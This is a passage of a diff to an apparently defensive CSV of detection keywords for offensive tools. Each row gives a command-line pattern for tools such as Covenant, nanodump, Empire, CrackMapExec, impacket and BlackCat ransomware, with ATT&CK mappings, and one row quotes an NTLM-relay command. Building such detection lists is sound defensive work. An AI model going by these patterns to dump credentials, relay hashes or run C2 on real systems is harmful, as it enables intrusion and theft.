Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" -"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* nanodump/*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1329,7 +1329,7 @@ "* nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NBNSBruteForce*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1342,8 +1342,8 @@ "* netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --NewCertPath *.pfx --NewCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* NewLocalAdmin(*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1357,21 +1357,21 @@ "* nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nla-redirection-host * --nla-redirection-port *","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "* nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* --no-http-server -smb2support -t * -c *","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* --no-net*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat 
ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NoP -sta -NonI -W Hidden -Enc *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and 
Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -no-pass rid-hijack*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "* --no-ppid-spoof*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 